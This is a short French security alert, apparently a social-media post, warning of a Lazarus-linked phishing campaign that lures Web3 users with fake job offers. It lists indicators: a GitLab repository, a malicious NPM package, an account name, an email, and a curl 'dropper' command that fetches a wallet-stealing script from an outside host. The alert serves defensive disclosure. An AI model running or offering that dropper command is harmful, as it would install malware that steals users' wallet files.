🚨 Alerte de sécurité TI 🚨

Selon le partenaire communautaire @1nf0s3cpt, une campagne de phishing active cible les utilisateurs de Web3 avec de fausses offres d'emploi (par exemple, 120$/heure) pour les tromper en exécutant un script malveillant qui vole des fichiers de portefeuille.

🔍 IOCs clés :
🔸Dépôt GitLab : https://t.co/ivGN93PS4b
🔸Dropper : curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 La méthode d'attaque est très similaire à l'utilisation précédente de NPM par Lazarus pour propager du code malveillant :
https://t.co/bBC4i2vYpA

🚨 Nous avons découvert qu'un nouveau paquet NPM malveillant venait d'être publié :
https://t.co/SjgmO1FOIL
🔸GitHub probablement lié : apollo-hero
🔸Email de l'uploader : skelstar125@gmail.com

⚠️ NE PAS installer ou exécuter de paquets ou de scripts inconnus. Toujours vérifier les sources.

#LAZARUS #Phishing